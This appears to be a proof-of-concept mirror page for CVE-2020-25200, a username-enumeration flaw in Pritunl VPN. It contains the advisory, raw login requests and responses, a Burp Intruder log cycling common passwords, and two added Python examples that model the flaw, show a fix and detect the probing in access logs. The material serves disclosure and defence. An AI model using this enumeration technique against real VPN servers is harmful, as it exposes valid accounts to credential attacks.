Related vulnerability
Title: Pritunl information disclosure vulnerability (CVE-2020-25200). Description: Pritunl is a distributed enterprise VPN service based on the OpenVPN protocol, built by an individual developer; the product provides a visual display of VPN connection status. Pritunl 1.29.2145.25 contains an information disclosure vulnerability that an attacker can use to enumerate valid VPN usernames through a series of /auth/session login attempts.
Description
pritunl-CVE-2020-25200
Introduction
CVE-2020-25200
Pritunl VPN server - Affected version: Pritunl v1.29.2145.25 553bbd
=========================
Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login
attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely.
=========================
To exploit this vulnerability, the attacker repeatedly submits login attempts with the same username. Initially the server returns error 401, but after 20 attempts it
starts returning error 400 if the username is valid; if the username is invalid, the server keeps returning error 401 indefinitely. A username's existence can
therefore be confirmed by observing error 400.
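The following is an added example, not Pritunl's code and not part of the advisory: a simplified model of the response oracle described above, next to a hardened variant. The 20-attempt threshold and the 400/401 codes come from the advisory; the handler classes, the in-memory user store and the counter layout are assumptions made for the illustration. The point it demonstrates is that the leak is not the lockout itself but the fact that the lockout state is only tracked for accounts that exist.

```python
"""Added example modelling CVE-2020-25200 as described in the advisory.
This is NOT Pritunl's code: the handler classes, the in-memory user store
and the counter layout are assumptions; the 20-attempt threshold and the
400/401 status codes are taken from the advisory text."""
from collections import defaultdict

ATTEMPT_LIMIT = 20  # lockout threshold reported in the advisory

# Constructed user store; only the username matters here because every
# password submitted in this model is wrong, which is the path the oracle lives on.
VALID_USERS = {"pritunl"}

INVALID = (401, {"error": "auth_invalid",
                 "error_msg": "Authentication credentials are not valid."})
TOO_MANY = (400, {"error": "auth_too_many",
                  "error_msg": "Too many authentication attempts."})


class VulnerableAuth:
    """Reproduces the leak: the lockout counter is only maintained for
    accounts that exist, so only they ever switch from 401 to 400."""

    def __init__(self):
        self.attempts = defaultdict(int)

    def login(self, username, password):
        if username not in VALID_USERS:
            # Unknown account: no counter is touched, 401 forever.
            return INVALID
        self.attempts[username] += 1
        if self.attempts[username] > ATTEMPT_LIMIT:
            return TOO_MANY
        # Password verification elided: every attempt in this model fails.
        return INVALID


class HardenedAuth:
    """Identical handling for known and unknown usernames: the counter is
    incremented before the account lookup, so the sequence of responses no
    longer depends on whether the account exists."""

    def __init__(self):
        self.attempts = defaultdict(int)

    def login(self, username, password):
        self.attempts[username] += 1
        if self.attempts[username] > ATTEMPT_LIMIT:
            return TOO_MANY
        _exists = username in VALID_USERS  # looked up, never reflected in the reply
        return INVALID


def final_status(auth, username, attempts=ATTEMPT_LIMIT + 1):
    """Submit `attempts` failed logins for one username and return the last status code."""
    status = None
    for _ in range(attempts):
        status, _body = auth.login(username, "wrong-password")
    return status


def leaks_existence(auth_factory):
    """True when a known and an unknown username end up with different
    status codes after the same number of failed attempts."""
    return final_status(auth_factory(), "pritunl") != final_status(auth_factory(), "admin")


if __name__ == "__main__":
    print("vulnerable leaks existence:", leaks_existence(VulnerableAuth))  # True
    print("hardened leaks existence:", leaks_existence(HardenedAuth))      # False
```

Counting attempts per submitted username regardless of whether the account exists removes the differential, but it also means any name can be driven into the lockout state; in a real service this counter is normally combined with a per-client limit and a generic failure message so that neither the status code nor the body varies with account existence.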
=========================
HTTP request and response for a valid username (after 20 attempts):
POST /auth/session HTTP/1.1
Host: 192.168.1.18
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 40
Origin: https://192.168.1.18
Connection: close
Referer: https://192.168.1.18/login

{"username":"pritunl","password":"paul"}

HTTP/1.1 400 Bad Request
Cache-Control: no-cache, no-store, must-revalidate
Content-Length: 76
Content-Type: application/json
Date: Thu, 03 Sep 2020 22:42:39 GMT
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
Connection: close

{"error_msg": "Too many authentication attempts.", "error": "auth_too_many"}
=========================
HTTP request and response for an invalid username (after 20 attempts):
POST /auth/session HTTP/1.1
Host: 192.168.1.18
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 39
Origin: https://192.168.1.18
Connection: close
Referer: https://192.168.1.18/login

{"username":"admin","password":"scott"}

HTTP/1.1 401 Unauthorized
Cache-Control: no-cache, no-store, must-revalidate
Content-Length: 83
Content-Type: application/json
Date: Thu, 03 Sep 2020 22:42:43 GMT
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
Connection: close

{"error_msg": "Authentication credentials are not valid.", "error": "auth_invalid"}
=========================
Burp Intruder Log (columns: Request, Payload, Status, Error, Timeout, Length; request 0 is the unmodified baseline request with no payload):
0 401 false false 370
1 123456 401 false false 370
2 password 401 false false 370
3 12345678 401 false false 370
4 qwerty 401 false false 370
5 123456789 401 false false 370
6 12345 401 false false 370
7 1234 401 false false 370
8 111111 401 false false 370
9 1234567 401 false false 370
10 dragon 401 false false 370
11 123123 401 false false 370
12 baseball 401 false false 370
13 abc123 401 false false 370
14 football 401 false false 370
15 monkey 401 false false 370
16 letmein 401 false false 370
17 696969 401 false false 370
18 shadow 401 false false 370
19 master 401 false false 370
20 666666 400 false false 362 <-------------- change of the length and of the response code
21 qwertyuiop 400 false false 362
22 123321 400 false false 362
23 mustang 400 false false 362
24 1234567890 400 false false 362
25 michael 400 false false 362
26 654321 400 false false 362
27 pussy 400 false false 362
28 superman 400 false false 362
29 1qaz2wsx 400 false false 362
30 7777777 400 false false 362
31 xxxxx 400 false false 362
32 121212 400 false false 362
33 000000 400 false false 362
34 qazwsx 400 false false 362
35 123qwe 400 false false 362
36 killer 400 false false 362
37 trustno1 400 false false 362
38 jordan 400 false false 362
39 jennifer 400 false false 362
40 zxcvbnm 400 false false 362
41 asdfgh 400 false false 362
42 hunter 400 false false 362
<<CUT>>
=========================
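The Intruder log above shows what this probing looks like from the attacker's side: a run of 401 responses that flips to 400 at the 21st request. The following is an added example, not from the advisory or from Pritunl, of the same pattern seen from the server side: a small detector run over constructed web-server access log lines (combined log format, with invented client addresses) that flags clients that hammer /auth/session and clients whose responses flip from 401 to 400, which is the lockout firing. The log format, field names and thresholds are assumptions.

```python
"""Added example: detecting the CVE-2020-25200 probing pattern in access logs.
Not part of the advisory or of Pritunl; the log format, IPs and thresholds
are constructed for the illustration."""
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

LOGIN_PATH = "/auth/session"  # endpoint named in the advisory


def parse(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_enumeration(lines, threshold=20):
    """Group failed POST /auth/session responses per client address.

    A client is reported when it produced at least `threshold` failures
    (the advisory's lockout count) or when its responses changed from 401
    to 400, which means the lockout was triggered for a real account.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        if rec["status"] in ("400", "401"):
            per_ip[rec["ip"]].append(int(rec["status"]))

    findings = {}
    for ip, statuses in per_ip.items():
        flipped = any(a == 401 and b == 400 for a, b in zip(statuses, statuses[1:]))
        if len(statuses) >= threshold or flipped:
            findings[ip] = {"failures": len(statuses), "lockout_observed": flipped}
    return findings


def _line(ip, status, size, second):
    """Build one constructed access-log line for the sample below."""
    return (f'{ip} - - [03/Sep/2020:22:42:{second:02d} +0000] '
            f'"POST {LOGIN_PATH} HTTP/1.1" {status} {size} '
            f'"https://192.168.1.18/login" "Mozilla/5.0"')


# Constructed sample: one client makes 20 failures then hits the lockout (400),
# another client mistypes a password twice and then loads the login page.
SAMPLE_LOG = (
    [_line("10.0.0.5", 401, 83, s) for s in range(20)]
    + [_line("10.0.0.5", 400, 76, s) for s in range(20, 23)]
    + [_line("10.0.0.9", 401, 83, s) for s in range(2)]
    + ['10.0.0.9 - - [03/Sep/2020:22:43:05 +0000] "GET /login HTTP/1.1" 200 1234 "-" "Mozilla/5.0"']
)

if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

Because the username travels in the POST body, it is not in the access log, so this detector keys on the client address; an attacker spreading attempts across many addresses stays below the per-client threshold, and the 401-to-400 flip is then the more reliable signal. On a patched server where the lockout behaves identically for unknown names, the flip alone no longer confirms that an account exists, but it still marks a client that exhausted the attempt budget.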
Security Researcher - Lukasz Studniarz
File snapshot
[4.0K] /data/pocs/abee6d56b9dfc086ee07603d89af8ce9e4cc9f95
├── [4.0K] CVE-2020-25200
└── [4.0K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or inaccessible, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.